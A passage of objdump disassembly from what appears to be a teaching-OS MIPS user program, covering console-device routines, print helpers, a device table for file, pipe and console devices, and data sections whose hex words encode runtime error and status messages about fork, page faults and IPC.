402f84: 27b30010 addiu s3,sp,16
402f88: 3c140040 lui s4,0x40
402f8c: 02238023 subu s0,s1,v1
402f90: 2e020080 sltiu v0,s0,128
402f94: 14400002 bnez v0,402fa0 <cons_write+0x58>
402f98: 02a32021 addu a0,s5,v1
402f9c: 2410007f li s0,127
402fa0: 27a50010 addiu a1,sp,16
402fa4: 0c100322 jal 400c88 <user_bcopy>
402fa8: 02003021 move a2,s0
402fac: 02701021 addu v0,s3,s0
402fb0: a0400000 sb zero,0(v0)
402fb4: 26847604 addiu a0,s4,30212
402fb8: 0c100086 jal 400218 <writef>
402fbc: 02602821 move a1,s3
402fc0: 02509021 addu s2,s2,s0
402fc4: 0251102b sltu v0,s2,s1
402fc8: 1440fff0 bnez v0,402f8c <cons_write+0x44>
402fcc: 02401821 move v1,s2
402fd0: 02401021 move v0,s2
402fd4: 8fbf00a8 lw ra,168(sp)
402fd8: 8fb500a4 lw s5,164(sp)
402fdc: 8fb400a0 lw s4,160(sp)
402fe0: 8fb3009c lw s3,156(sp)
402fe4: 8fb20098 lw s2,152(sp)
402fe8: 8fb10094 lw s1,148(sp)
402fec: 8fb00090 lw s0,144(sp)
402ff0: 03e00008 jr ra
402ff4: 27bd00b0 addiu sp,sp,176
00402ff8 <cons_close>:
402ff8: 03e00008 jr ra
402ffc: 00001021 move v0,zero
00403000 <cons_stat>:
403000: 27bdffe8 addiu sp,sp,-24
403004: afbf0010 sw ra,16(sp)
403008: 00a02021 move a0,a1
40300c: 3c050040 lui a1,0x40
403010: 0c100647 jal 40191c <strcpy>
403014: 24a57608 addiu a1,a1,30216
403018: 00001021 move v0,zero
40301c: 8fbf0010 lw ra,16(sp)
403020: 00000000 nop
403024: 03e00008 jr ra
403028: 27bd0018 addiu sp,sp,24
40302c: 00000000 nop
00403030 <user_out2string>:
403030: 24020001 li v0,1
403034: 14c2000d bne a2,v0,40306c <user_out2string+0x3c>
403038: 00000000 nop
40303c: 80a20000 lb v0,0(a1)
403040: 00000000 nop
403044: 1040000b beqz v0,403074 <user_out2string+0x44>
403048: 00003821 move a3,zero
40304c: 00871021 addu v0,a0,a3
403050: 00a71821 addu v1,a1,a3
403054: 90630000 lbu v1,0(v1)
403058: 24e70001 addiu a3,a3,1
40305c: 10c70005 beq a2,a3,403074 <user_out2string+0x44>
403060: a0430000 sb v1,0(v0)
403064: 1000fffa b 403050 <user_out2string+0x20>
403068: 00871021 addu v0,a0,a3
40306c: 1cc0fff7 bgtz a2,40304c <user_out2string+0x1c>
403070: 00003821 move a3,zero
403074: 03e00008 jr ra
403078: 00000000 nop
0040307c <fwritef>:
40307c: 27bdfdd8 addiu sp,sp,-552
403080: afbf0220 sw ra,544(sp)
403084: afb1021c sw s1,540(sp)
403088: afb00218 sw s0,536(sp)
40308c: 00808821 move s1,a0
403090: afa60230 sw a2,560(sp)
403094: afa70234 sw a3,564(sp)
403098: 00a08021 move s0,a1
40309c: 27a20230 addiu v0,sp,560
4030a0: afa20210 sw v0,528(sp)
4030a4: 27a40010 addiu a0,sp,16
4030a8: 0c100344 jal 400d10 <user_bzero>
4030ac: 24050200 li a1,512
4030b0: 3c040040 lui a0,0x40
4030b4: 24843030 addiu a0,a0,12336
4030b8: 27a50010 addiu a1,sp,16
4030bc: 8fa70210 lw a3,528(sp)
4030c0: 0c1000b0 jal 4002c0 <user_lp_Print>
4030c4: 02003021 move a2,s0
4030c8: 0c10063c jal 4018f0 <strlen>
4030cc: 27a40010 addiu a0,sp,16
4030d0: 02202021 move a0,s1
4030d4: 27a50010 addiu a1,sp,16
4030d8: 0c1007fe jal 401ff8 <write>
4030dc: 00403021 move a2,v0
4030e0: 8fbf0220 lw ra,544(sp)
4030e4: 8fb1021c lw s1,540(sp)
4030e8: 8fb00218 lw s0,536(sp)
4030ec: 03e00008 jr ra
4030f0: 27bd0228 addiu sp,sp,552
...
Disassembly of section .reginfo:
00403100 <.reginfo>:
403100: f7fffffe 0xf7fffffe
...
Disassembly of section .data:
00404000 <fsipcbuf>:
...
00405000 <fdtab>:
...
00406000 <envs>:
406000: 7f400000 0x7f400000
00406004 <pages>:
406004: 7f800000 0x7f800000
00406008 <vpt>:
406008: 7fc00000 0x7fc00000
0040600c <vpd>:
40600c: 7fdff000 0x7fdff000
00406010 <__pgfault_handler>:
...
00407000 <user_theFatalMsg>:
407000: 66617461 0x66617461
407004: 6c206572 0x6c206572
407008: 726f7220 0x726f7220
40700c: 696e2075 0x696e2075
407010: 7365725f 0x7365725f
407014: 6c705f50 0x6c705f50
407018: 72696e74 0x72696e74
40701c: 21000000 addi zero,t0,0
407020: 00000000 nop
407024: 00400820 add at,v0,zero
407028: 00400828 0x400828
40702c: 00400828 0x400828
407030: 00400828 0x400828
407034: 00400828 0x400828
407038: 00400828 0x400828
40703c: 00400828 0x400828
407040: 00400828 0x400828
407044: 00400828 0x400828
407048: 00400828 0x400828
40704c: 00400828 0x400828
407050: 00400828 0x400828
407054: 00400828 0x400828
407058: 00400828 0x400828
40705c: 00400828 0x400828
407060: 00400828 0x400828
407064: 00400828 0x400828
407068: 00400828 0x400828
40706c: 00400828 0x400828
407070: 00400828 0x400828
407074: 00400828 0x400828
407078: 00400828 0x400828
40707c: 00400828 0x400828
407080: 00400828 0x400828
407084: 00400828 0x400828
407088: 00400828 0x400828
40708c: 00400828 0x400828
407090: 00400828 0x400828
407094: 00400828 0x400828
407098: 00400828 0x400828
40709c: 00400828 0x400828
4070a0: 00400828 0x400828
4070a4: 00400828 0x400828
4070a8: 00400828 0x400828
4070ac: 00400828 0x400828
4070b0: 00400828 0x400828
4070b4: 00400828 0x400828
4070b8: 00400828 0x400828
4070bc: 00400828 0x400828
4070c0: 00400828 0x400828
4070c4: 00400828 0x400828
4070c8: 00400828 0x400828
4070cc: 00400828 0x400828
4070d0: 00400828 0x400828
4070d4: 00400828 0x400828
4070d8: 00400828 0x400828
4070dc: 00400828 0x400828
4070e0: 00400828 0x400828
4070e4: 00400828 0x400828
4070e8: 00400828 0x400828
4070ec: 00400828 0x400828
4070f0: 00400828 0x400828
4070f4: 00400828 0x400828
4070f8: 00400828 0x400828
4070fc: 00400828 0x400828
407100: 00400828 0x400828
407104: 00400828 0x400828
407108: 00400828 0x400828
40710c: 00400828 0x400828
407110: 00400828 0x400828
407114: 00400828 0x400828
407118: 00400828 0x400828
40711c: 00400828 0x400828
407120: 00400828 0x400828
407124: 00400828 0x400828
407128: 00400828 0x400828
40712c: 00400828 0x400828
407130: 00400828 0x400828
407134: 0040050c syscall 0x10014
407138: 00400828 0x400828
40713c: 00400828 0x400828
407140: 00400828 0x400828
407144: 00400828 0x400828
407148: 00400828 0x400828
40714c: 00400828 0x400828
407150: 00400828 0x400828
407154: 00400828 0x400828
407158: 00400828 0x400828
40715c: 00400828 0x400828
407160: 00400594 0x400594
407164: 00400828 0x400828
407168: 00400828 0x400828
40716c: 00400828 0x400828
407170: 00400828 0x400828
407174: 00400828 0x400828
407178: 0040060c syscall 0x10018
40717c: 00400828 0x400828
407180: 00400828 0x400828
407184: 004006fc 0x4006fc
407188: 00400828 0x400828
40718c: 00400828 0x400828
407190: 00400828 0x400828
407194: 00400828 0x400828
407198: 00400828 0x400828
40719c: 00400828 0x400828
4071a0: 00400828 0x400828
4071a4: 00400828 0x400828
4071a8: 00400828 0x400828
4071ac: 00400494 0x400494
4071b0: 00400778 0x400778
4071b4: 0040050c syscall 0x10014
4071b8: 00400828 0x400828
4071bc: 00400828 0x400828
4071c0: 00400828 0x400828
4071c4: 00400828 0x400828
4071c8: 00400828 0x400828
4071cc: 00400828 0x400828
4071d0: 00400828 0x400828
4071d4: 00400828 0x400828
4071d8: 00400828 0x400828
4071dc: 00400828 0x400828
4071e0: 00400594 0x400594
4071e4: 00400828 0x400828
4071e8: 00400828 0x400828
4071ec: 00400828 0x400828
4071f0: 004007cc syscall 0x1001f
4071f4: 00400828 0x400828
4071f8: 0040060c syscall 0x10018
4071fc: 00400828 0x400828
407200: 00400828 0x400828
407204: 00400684 0x400684
...
407210: 09097468 j 425d1a0 <end+0x3e55198>
407214: 69732069 0x69732069
407218: 73206368 0x73206368
40721c: 696c6432 0x696c6432
407220: 203a613a addi k0,at,24890
407224: 25640a00 addiu a0,t3,2560
407228: 09746869 j 5d1a1a4 <end+0x591219c>
40722c: 73206973 0x73206973
407230: 20636869 addi v1,v1,26729
407234: 6c64203a 0x6c64203a
407238: 613a2564 0x613a2564
40723c: 0a000000 j 8000000 <end+0x7bf7ff8>
407240: 74686973 jalx 1a1a5cc <end+0x16125c4>
407244: 20697320 addi t1,v1,29472
407248: 66617468 0x66617468
40724c: 65723a20 0x65723a20
407250: 613a2564 0x613a2564
407254: 0a000000 j 8000000 <end+0x7bf7ff8>
407258: 70616e69 0x70616e69
40725c: 63206174 0x63206174
407260: 2025733a addi a1,at,29498
407264: 25643a20 addiu a0,t3,14880
407268: 00000000 nop
40726c: 666f726b 0x666f726b
407270: 2e630000 sltiu v1,s3,0
407274: 55736572 0x55736572
407278: 20706766 addi s0,v1,26470
40727c: 61756c74 0x61756c74
407280: 20686164 addi t0,v1,24932
407284: 646c6572 0x646c6572
407288: 20666163 addi a2,v1,24931
40728c: 696e6720 0x696e6720
407290: 61206e6f 0x61206e6f
407294: 6e2d434f 0x6e2d434f
407298: 57207061 0x57207061
40729c: 67650a00 0x67650a00
4072a0: 55736572 0x55736572
4072a4: 20706766 addi s0,v1,26470
4072a8: 61756c74 0x61756c74
4072ac: 20686164 addi t0,v1,24932
4072b0: 646c6572 0x646c6572
4072b4: 206d656d addi t5,v1,25965
4072b8: 5f616c6c 0x5f616c6c
4072bc: 6f632066 0x6f632066
4072c0: 61696c64 0x61696c64
4072c4: 0a000000 j 8000000 <end+0x7bf7ff8>
4072c8: 55736572 0x55736572
4072cc: 20706766 addi s0,v1,26470
4072d0: 61756c74 0x61756c74
4072d4: 20686164 addi t0,v1,24932
4072d8: 646c6572 0x646c6572
4072dc: 206d656d addi t5,v1,25965
4072e0: 5f6d6170 0x5f6d6170
4072e4: 20666169 addi a2,v1,24937
4072e8: 6c640a00 0x6c640a00
4072ec: 55736572 0x55736572
4072f0: 20706766 addi s0,v1,26470
4072f4: 61756c74 0x61756c74
4072f8: 20686164 addi t0,v1,24932
4072fc: 646c6572 0x646c6572
407300: 206d656d addi t5,v1,25965
407304: 5f756e6d 0x5f756e6d
407308: 61702066 0x61702066
40730c: 61696c65 0x61696c65
407310: 640a0000 0x640a0000
407314: 6661696c 0x6661696c
407318: 65642074 0x65642074
40731c: 6f206475 0x6f206475
407320: 70207265 0x70207265
407324: 61642d6f 0x61642d6f
407328: 6e6c7920 0x6e6c7920
40732c: 5054450a 0x5054450a
407330: 00000000 nop
407334: 6661696c 0x6661696c
407338: 65642074 0x65642074
40733c: 6f206475 0x6f206475
407340: 70204c49 0x70204c49
407344: 42415241 c0 0x415241
407348: 59205054 0x59205054
40734c: 450a0000 0x450a0000
407350: 6661696c 0x6661696c
407354: 65642074 0x65642074
407358: 6f206475 0x6f206475
40735c: 70205054 0x70205054
407360: 45207768 0x45207768
407364: 69636820 0x69636820
407368: 68617320 0x68617320
40736c: 6265656e 0x6265656e
407370: 20647570 addi a0,v1,30064
407374: 6c696361 0x6c696361
407378: 74656420 jalx 1959080 <end+0x1551078>
40737c: 6265666f 0x6265666f
407380: 72650a00 0x72650a00
407384: 6661696c 0x6661696c
407388: 65642074 0x65642074
40738c: 6f206475 0x6f206475
407390: 70205054 0x70205054
407394: 45207769 0x45207769
407398: 74682043 jalx 1a0810c <end+0x1600104>
40739c: 4f572069 c3 0x1572069
4073a0: 6e206368 0x6e206368
4073a4: 696c6420 0x696c6420
4073a8: 656e760a 0x656e760a
4073ac: 00000000 nop
4073b0: 6661696c 0x6661696c
4073b4: 65642074 0x65642074
4073b8: 6f206475 0x6f206475
4073bc: 70205054 0x70205054
4073c0: 45207769 0x45207769
4073c4: 74682043 jalx 1a0810c <end+0x1600104>
4073c8: 4f572069 c3 0x1572069
4073cc: 6e206661 0x6e206661
4073d0: 74686572 jalx 1a195c8 <end+0x16115c0>
4073d4: 20656e76 addi a1,v1,28278
4073d8: 0a000000 j 8000000 <end+0x7bf7ff8>
4073dc: 666f726b 0x666f726b
4073e0: 20616c6c addi at,v1,27756
4073e4: 6f63206d 0x6f63206d
4073e8: 656d2066 0x656d2066
4073ec: 61696c65 0x61696c65
4073f0: 640a0000 0x640a0000
4073f4: 666f726b 0x666f726b
4073f8: 20736574 addi s3,v1,25972
4073fc: 20706766 addi s0,v1,26470
407400: 61756c74 0x61756c74
407404: 5f68616e 0x5f68616e
407408: 646c6572 0x646c6572
40740c: 20666169 addi a2,v1,24937
407410: 6c65640a 0x6c65640a
407414: 00000000 nop
407418: 666f726b 0x666f726b
40741c: 20736574 addi s3,v1,25972
407420: 20737461 addi s3,v1,29793
407424: 74757320 jalx 1d5cc80 <end+0x1954c78>
407428: 6661696c 0x6661696c
40742c: 65640a00 0x65640a00
407430: 73666f72 0x73666f72
407434: 6b206e6f 0x6b206e6f
407438: 7420696d jalx 81a5b4 <end+0x4125ac>
40743c: 706c656d 0x706c656d
407440: 656e7465 0x656e7465
407444: 64000000 0x64000000
407448: 63616e6e 0x63616e6e
40744c: 6f742073 0x6f742073
407450: 65742070 0x65742070
407454: 67666175 0x67666175
407458: 6c742068 0x6c742068
40745c: 616e646c 0x616e646c
407460: 65720a00 0x65720a00
407464: 6970632e 0x6970632e
407468: 63000000 0x63000000
40746c: 6572726f 0x6572726f
407470: 7220696e 0x7220696e
407474: 20697063 addi t1,v1,28771
407478: 5f73656e 0x5f73656e
40747c: 643a2025 0x643a2025
407480: 64000000 0x64000000
407484: 5b253038 0x5b253038
407488: 785d2075 0x785d2075
40748c: 6e6b6e6f 0x6e6b6e6f
407490: 776e2064 jalx db88190 <end+0xd780188>
407494: 65766963 0x65766963
407498: 65207479 0x65207479
40749c: 70652025 0x70652025
4074a0: 640a0000 0x640a0000
4074a4: 5b253038 0x5b253038
4074a8: 785d2072 0x785d2072
4074ac: 65616420 0x65616420
4074b0: 2564202d addiu a0,t3,8237
4074b4: 2d206261 sltiu zero,t1,25185
4074b8: 64206d6f 0x64206d6f
4074bc: 64650a00 0x64650a00
4074c0: 5b253038 0x5b253038
4074c4: 785d2077 0x785d2077
4074c8: 72697465 0x72697465
4074cc: 20256420 addi a1,at,25632
4074d0: 2d2d2062 sltiu t5,t1,8290
4074d4: 6164206d 0x6164206d
4074d8: 6f64650a 0x6f64650a
4074dc: 00000000 nop
4074e0: 66696c65 0x66696c65
4074e4: 00000000 nop
4074e8: 57697468 0x57697468
4074ec: 6f757420 0x6f757420
4074f0: 66726565 0x66726565
4074f4: 20666420 addi a2,v1,25632
4074f8: 6c656674 0x6c656674
4074fc: 0a000000 j 8000000 <end+0x7bf7ff8>
407500: 63616e6e 0x63616e6e
407504: 6f6e7420 0x6f6e7420
407508: 6f70656e 0x6f70656e
40750c: 2066696c addi a2,v1,26988
407510: 65202573 0x65202573
407514: 0a000000 j 8000000 <end+0x7bf7ff8>
407518: 63616e6e 0x63616e6e
40751c: 6f74206d 0x6f74206d
407520: 61702074 0x61702074
407524: 68652066 0x68652066
407528: 696c652e 0x696c652e
40752c: 0a000000 j 8000000 <end+0x7bf7ff8>
407530: 63616e6e 0x63616e6e
407534: 6f742063 0x6f742063
407538: 6c6f7365 0x6c6f7365
40753c: 20746865 addi s4,v1,26725
407540: 2066696c addi a2,v1,26988
407544: 650a0000 0x650a0000
407548: 63616e6e 0x63616e6e
40754c: 6f6e7420 0x6f6e7420
407550: 756e6d61 jalx 5b9b584 <end+0x579357c>
407554: 70207468 0x70207468
407558: 65206669 0x65206669
40755c: 6c652e0a 0x6c652e0a
407560: 00000000 nop
407564: 66696c65 0x66696c65
407568: 2e630000 sltiu v1,s3,0
40756c: 66747275 0x66747275
407570: 6e636174 0x6e636174
407574: 653a2073 0x653a2073
407578: 79736361 0x79736361
40757c: 6c6c5f6d 0x6c6c5f6d
407580: 656d5f75 0x656d5f75
407584: 6e6d6170 0x6e6d6170
407588: 20253038 addi a1,at,12344
40758c: 783a2025 0x783a2025
407590: 65000000 0x65000000
407594: 70697065 0x70697065
407598: 00000000 nop
40759c: 5b253038 0x5b253038
4075a0: 785d2070 0x785d2070
4075a4: 69706563 0x69706563
4075a8: 72656174 0x72656174
4075ac: 65200a00 0x65200a00
4075b0: 3c706970 0x3c706970
4075b4: 653e0000 0x653e0000
4075b8: 66736970 0x66736970
4075bc: 632e6300 0x632e6300
4075c0: 66736970 0x66736970
4075c4: 635f6d61 0x635f6d61
4075c8: 703a2075 0x703a2075
4075cc: 6e657870 0x6e657870
4075d0: 65637465 0x65637465
4075d4: 64207065 0x64207065
4075d8: 726d6973 0x726d6973
4075dc: 73696f6e 0x73696f6e
4075e0: 73202530 0x73202530
4075e4: 38782066 xori t8,v1,0x2066
4075e8: 6f722064 0x6f722064
4075ec: 73747661 0x73747661
4075f0: 20253038 addi a1,at,12344
4075f4: 78000000 0x78000000
4075f8: 636f6e73 0x636f6e73
4075fc: 00000000 nop
407600: 25630000 addiu v1,t3,0
407604: 25730000 addiu s3,t3,0
407608: 3c636f6e 0x3c636f6e
40760c: Address 0x000000000040760c is out of bounds.
Disassembly of section .data.rel:
00407610 <devtab>:
407610: 00407620 0x407620
407614: 00407658 0x407658
407618: 0040763c 0x40763c
40761c: 00000000 nop
Disassembly of section .data.rel.local:
00407620 <devfile>:
407620: 00000066 0x66
407624: 004074e0 0x4074e0
407628: 00402478 0x402478
40762c: 004025d4 0x4025d4
407630: 004023a0 0x4023a0
407634: 00402684 0x402684
407638: 00000000 nop
0040763c <devpipe>:
40763c: 00000070 0x70
407640: 00407594 0x407594
407644: 00402aa0 0x402aa0
407648: 00402aa8 0x402aa8
40764c: 00402b18 0x402b18
407650: 00402ab0 0x402ab0
407654: 00000000 nop
00407658 <devcons>:
407658: 00000063 0x63
40765c: 004075f8 0x4075f8
407660: 00402ea0 0x402ea0
407664: 00402f48 0x402f48
407668: 00402ff8 0x402ff8
40766c: 00403000 0x403000
407670: 00000000 nop
Disassembly of section .bss:
00408000 <global_a>:
408000: 00000000 nop
00408004 <env>:
408004: 00000000 nop
Disassembly of section .pdr:
00000000 <.pdr>:
0: 004000c0 0x4000c0
...
18: 0000001d 0x1d
1c: 0000001f 0x1f
20: 004000d0 0x4000d0
...
38: 0000001d 0x1d
3c: 0000001f 0x1f
40: 004000e0 0x4000e0
44: 80000000 lb zero,0(zero)
48: fffffff8 0xfffffff8
...
54: 00000018 mult zero,zero
58: 0000001d 0x1d
5c: 0000001f 0x1f
60: 00400180 0x400180
64: 80070000 lb a3,0(zero)
68: fffffffc 0xfffffffc
...
74: 00000020 add zero,zero,zero
78: 0000001d 0x1d
7c: 0000001f 0x1f
80: 00400218 0x400218
84: 80000000 lb zero,0(zero)
88: fffffff8 0xfffffff8
...
94: 00000020 add zero,zero,zero
98: 0000001d 0x1d
9c: 0000001f 0x1f
a0: 00400258 0x400258
a4: 80010000 lb at,0(zero)
a8: fffffffc 0xfffffffc
...
b4: 00000020 add zero,zero,zero
b8: 0000001d 0x1d
bc: 0000001f 0x1f
c0: 004002c0 0x4002c0
c4: 803f0000 lb ra,0(at)
c8: fffffff8 0xfffffff8
...
d4: 00000428 0x428
d8: 0000001d 0x1d
dc: 0000001f 0x1f
e0: 0040088c syscall 0x10022
...
f8: 0000001d 0x1d
fc: 0000001f 0x1f
100: 00400908 0x400908
...
118: 0000001d 0x1d
11c: 0000001f 0x1f
120: 00400a28 0x400a28
...
138: 0000001d 0x1d
13c: 0000001f 0x1f
140: 00400bc0 0x400bc0
144: 80000000 lb zero,0(zero)
148: fffffff8 0xfffffff8
...
154: 00000018 mult zero,zero
158: 0000001d 0x1d
15c: 0000001f 0x1f
160: 00400be0 0x400be0
164: 80070000 lb a3,0(zero)
168: fffffffc 0xfffffffc
...
174: 00000020 add zero,zero,zero
178: 0000001d 0x1d
17c: 0000001f 0x1f
180: 00400c60 0x400c60
184: 80000000 lb zero,0(zero)
188: fffffff8 0xfffffff8
...
194: 00000018 mult zero,zero
198: 0000001d 0x1d
19c: 0000001f 0x1f
1a0: 00400c88 0x400c88
...
1b8: 0000001d 0x1d
1bc: 0000001f 0x1f
1c0: 00400d10 0x400d10
...
1d8: 0000001d 0x1d
1dc: 0000001f 0x1f
1e0: 00400d3c 0x400d3c
1e4: 80030000 lb v1,0(zero)
1e8: fffffff8 0xfffffff8
...
1f4: 00000028 0x28
1f8: 0000001d 0x1d
1fc: 0000001f 0x1f
200: 00400e50 0x400e50
204: 80030000 lb v1,0(zero)
208: fffffff8 0xfffffff8
...
214: 00000028 0x28
218: 0000001d 0x1d
21c: 0000001f 0x1f
220: 00400fa8 0x400fa8
224: 801f0000 lb ra,0(zero)
228: fffffffc 0xfffffffc
...
234: 00000030 0x30
238: 0000001d 0x1d
23c: 0000001f 0x1f
240: 0040114c syscall 0x10045
244: 800f0000 lb t7,0(zero)
248: fffffff8 0xfffffff8
...
254: 00000030 0x30
258: 0000001d 0x1d
25c: 0000001f 0x1f
260: 00401210 0x401210
264: 803f0000 lb ra,0(at)
268: fffffff8 0xfffffff8
...
274: 00000038 0x38
278: 0000001d 0x1d
27c: 0000001f 0x1f
280: 00401410 0x401410
284: 80000000 lb zero,0(zero)
288: fffffff8 0xfffffff8
...
294: 00000018 mult zero,zero
298: 0000001d 0x1d
29c: 0000001f 0x1f
2a0: 00401430 0x401430
2a4: 80010000 lb at,0(zero)
2a8: fffffffc 0xfffffffc
...
2b4: 00000018 mult zero,zero
2b8: 0000001d 0x1d
2bc: 0000001f 0x1f
2c0: 004014b0 0x4014b0
2c4: 80000000 lb zero,0(zero)
2c8: fffffff8 0xfffffff8
...
2d4: 00000020 add zero,zero,zero
2d8: 0000001d 0x1d
2dc: 0000001f 0x1f
2e0: 004014e8 0x4014e8
2e4: 80000000 lb zero,0(zero)
2e8: fffffff8 0xfffffff8
...
2f4: 00000020 add zero,zero,zero
2f8: 0000001d 0x1d
2fc: 0000001f 0x1f
300: 0040151c 0x40151c
304: 80000000 lb zero,0(zero)
308: fffffff8 0xfffffff8
...
314: 00000020 add zero,zero,zero
318: 0000001d 0x1d
31c: 0000001f 0x1f
320: 00401550 0x401550
324: 80000000 lb zero,0(zero)
328: fffffff8 0xfffffff8
...
334: 00000020 add zero,zero,zero
338: 0000001d 0x1d
33c: 0000001f 0x1f
340: 00401584 0x401584
344: 80000000 lb zero,0(zero)
348: fffffff8 0xfffffff8
...
354: 00000020 add zero,zero,zero
358: 0000001d 0x1d
35c: 0000001f 0x1f
360: 004015c0 0x4015c0
364: 80000000 lb zero,0(zero)
368: fffffff8 0xfffffff8
...
374: 00000020 add zero,zero,zero
378: 0000001d 0x1d
37c: 0000001f 0x1f
380: 004015fc 0x4015fc
384: 80000000 lb zero,0(zero)
388: fffffff8 0xfffffff8
...
394: 00000020 add zero,zero,zero
398: 0000001d 0x1d
39c: 0000001f 0x1f
3a0: 00401644 0x401644
3a4: 80000000 lb zero,0(zero)
3a8: fffffff8 0xfffffff8
...
3b4: 00000020 add zero,zero,zero
3b8: 0000001d 0x1d
3bc: 0000001f 0x1f
3c0: 0040167c 0x40167c
3c4: 80000000 lb zero,0(zero)
3c8: fffffff8 0xfffffff8
...
3d4: 00000020 add zero,zero,zero
3d8: 0000001d 0x1d
3dc: 0000001f 0x1f
3e0: 004016b4 0x4016b4
3e4: 80000000 lb zero,0(zero)
3e8: fffffff8 0xfffffff8
...
3f4: 00000020 add zero,zero,zero
3f8: 0000001d 0x1d
3fc: 0000001f 0x1f
400: 004016ec 0x4016ec
404: 80000000 lb zero,0(zero)
408: fffffff8 0xfffffff8
...
414: 00000020 add zero,zero,zero
418: 0000001d 0x1d
41c: 0000001f 0x1f
420: 00401720 0x401720
424: 80000000 lb zero,0(zero)
428: fffffff8 0xfffffff8
...
434: 00000020 add zero,zero,zero
438: 0000001d 0x1d
43c: 0000001f 0x1f
440: 00401760 0x401760
444: 80000000 lb zero,0(zero)
448: fffffff8 0xfffffff8
...
454: 00000020 add zero,zero,zero
458: 0000001d 0x1d
45c: 0000001f 0x1f
460: 00401794 0x401794
464: 80000000 lb zero,0(zero)
468: fffffff8 0xfffffff8
...
474: 00000020 add zero,zero,zero
478: 0000001d 0x1d
47c: 0000001f 0x1f
480: 004017d0 0x4017d0
484: 801f0000 lb ra,0(zero)
488: fffffffc 0xfffffffc
...
494: 00000028 0x28
498: 0000001d 0x1d
49c: 0000001f 0x1f
4a0: 00401868 0x401868
4a4: 80030000 lb v1,0(zero)
4a8: fffffff8 0xfffffff8
...
4b4: 00000020 add zero,zero,zero
4b8: 0000001d 0x1d
4bc: 0000001f 0x1f
4c0: 004018f0 0x4018f0
...
4d8: 0000001d 0x1d
4dc: 0000001f 0x1f
4e0: 0040191c 0x40191c
...
4f8: 0000001d 0x1d
4fc: 0000001f 0x1f
500: 00401940 0x401940
...
518: 0000001d 0x1d
51c: 0000001f 0x1f
520: 00401994 0x401994
...
538: 0000001d 0x1d
53c: 0000001f 0x1f
540: 004019c8 0x4019c8
...
558: 0000001d 0x1d
55c: 0000001f 0x1f
560: 00401a50 0x401a50
564: 80000000 lb zero,0(zero)
568: fffffff8 0xfffffff8
...
574: 00000018 mult zero,zero
578: 0000001d 0x1d
57c: 0000001f 0x1f
580: 00401af0 0x401af0
...
598: 0000001d 0x1d
59c: 0000001f 0x1f
5a0: 00401b74 0x401b74
5a4: 80000000 lb zero,0(zero)
5a8: fffffff8 0xfffffff8
...
5b4: 00000018 mult zero,zero
5b8: 0000001d 0x1d
5bc: 0000001f 0x1f
5c0: 00401b98 0x401b98
...
5d8: 0000001d 0x1d
5dc: 0000001f 0x1f
5e0: 00401be8 0x401be8
5e4: 80000000 lb zero,0(zero)
5e8: fffffff8 0xfffffff8
...
5f4: 00000018 mult zero,zero
5f8: 0000001d 0x1d
5fc: 0000001f 0x1f
600: 00401c14 0x401c14
...
618: 0000001d 0x1d
61c: 0000001f 0x1f
620: 00401c24 0x401c24
...
638: 0000001d 0x1d
63c: 0000001f 0x1f
640: 00401c34 0x401c34
644: 80010000 lb at,0(zero)
648: fffffffc 0xfffffffc
...
654: 00000020 add zero,zero,zero
658: 0000001d 0x1d
65c: 0000001f 0x1f
660: 00401ca4 0x401ca4
664: 80030000 lb v1,0(zero)
668: fffffff8 0xfffffff8
...
674: 00000020 add zero,zero,zero
678: 0000001d 0x1d
67c: 0000001f 0x1f
680: 00401ce4 0x401ce4
684: 80ff0000 lb ra,0(a3)
688: fffffff8 0xfffffff8
...
694: 00000048 0x48
698: 0000001d 0x1d
69c: 0000001f 0x1f
6a0: 00401e88 0x401e88
6a4: 80070000 lb a3,0(zero)
6a8: fffffffc 0xfffffffc
...
6b4: 00000028 0x28
6b8: 0000001d 0x1d
6bc: 0000001f 0x1f
6c0: 00401f70 0x401f70
6c4: 800f0000 lb t7,0(zero)
6c8: fffffff8 0xfffffff8
...
6d4: 00000028 0x28
6d8: 0000001d 0x1d
6dc: 0000001f 0x1f
6e0: 00401ff8 0x401ff8
6e4: 80070000 lb a3,0(zero)
6e8: fffffffc 0xfffffffc
...
6f4: 00000028 0x28
6f8: 0000001d 0x1d
6fc: 0000001f 0x1f
700: 004020dc 0x4020dc
704: 80010000 lb at,0(zero)
708: fffffffc 0xfffffffc
...
714: 00000020 add zero,zero,zero
718: 0000001d 0x1d
71c: 0000001f 0x1f
720: 0040211c 0x40211c
724: 80010000 lb at,0(zero)
728: fffffffc 0xfffffffc
...
734: 00000020 add zero,zero,zero
738: 0000001d 0x1d
73c: 0000001f 0x1f
740: 00402190 0x402190
744: 80030000 lb v1,0(zero)
748: fffffff8 0xfffffff8
...
754: 00000020 add zero,zero,zero
758: 0000001d 0x1d
75c: 0000001f 0x1f
760: 004021f0 0x4021f0
...
778: 0000001d 0x1d
77c: 0000001f 0x1f
780: 00402280 0x402280
784: 801f0000 lb ra,0(zero)
788: fffffffc 0xfffffffc
...
794: 00000030 0x30
798: 0000001d 0x1d
79c: 0000001f 0x1f
7a0: 004023a0 0x4023a0
7a4: 800f0000 lb t7,0(zero)
7a8: fffffff8 0xfffffff8
...
7b4: 00000028 0x28
7b8: 0000001d 0x1d
7bc: 0000001f 0x1f
7c0: 00402478 0x402478
7c4: 80070000 lb a3,0(zero)
7c8: fffffffc 0xfffffffc
...
7d4: 00000020 add zero,zero,zero
7d8: 0000001d 0x1d
7dc: 0000001f 0x1f
7e0: 004024f8 0x4024f8
7e4: 80030000 lb v1,0(zero)
7e8: fffffff8 0xfffffff8
...
7f4: 00000028 0x28
7f8: 0000001d 0x1d
7fc: 0000001f 0x1f
800: 004025d4 0x4025d4
804: 801f0000 lb ra,0(zero)
808: fffffffc 0xfffffffc
...
814: 00000028 0x28
818: 0000001d 0x1d
81c: 0000001f 0x1f
820: 00402684 0x402684
824: 80030000 lb v1,0(zero)
828: fffffff8 0xfffffff8
...
834: 00000020 add zero,zero,zero
838: 0000001d 0x1d
83c: 0000001f 0x1f
840: 004026e0 0x4026e0
844: c0ff0000 lwc0 $31,0(a3)
848: fffffffc 0xfffffffc
...
854: 00000048 0x48
858: 0000001d 0x1d
85c: 0000001f 0x1f
860: 00402878 0x402878
864: 80000000 lb zero,0(zero)
868: fffffff8 0xfffffff8
...
874: 00000018 mult zero,zero
878: 0000001d 0x1d
87c: 0000001f 0x1f
880: 00402898 0x402898
884: 80000000 lb zero,0(zero)
888: fffffff8 0xfffffff8
...
894: 00000018 mult zero,zero
898: 0000001d 0x1d
89c: 0000001f 0x1f
8a0: 004028c0 0x4028c0
8a4: 80070000 lb a3,0(zero)
8a8: fffffffc 0xfffffffc
...
